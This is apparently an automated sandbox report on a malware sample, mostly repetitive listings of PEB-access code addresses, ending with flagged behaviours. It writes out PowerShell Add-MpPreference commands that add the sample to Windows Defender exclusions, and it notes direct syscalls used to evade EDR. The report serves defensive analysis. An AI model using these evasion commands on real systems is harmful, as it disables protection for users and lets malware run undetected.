Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016127ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016127ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016127ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FC7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F47FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F47FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016707C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169678E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F07AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B866E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B866E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01622674 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160C640 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01626620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E627 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160260B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E609 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F262C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632619 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016706F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016706F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4690 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4690 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016266B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163096E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163096E mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163096E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694978 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01694978 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C97C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01670946 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0168892B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8918 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E8918 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167892A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E908 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166E908 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C912 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FA9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016229F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016229F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016869C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016249D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016789B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016789B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016789B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F09AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F09AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4859 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F4859 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E872 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167E872 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686870 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686870 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01602840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620854 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169483A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169483A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C810 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167C89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015ECB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01686B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01698B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169EB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166EB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167CBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01610BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169EBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169EA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F6A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166CA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166CA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01614A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01614A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167CA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01646AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C4A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01628A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01688D6B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F8D59 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC
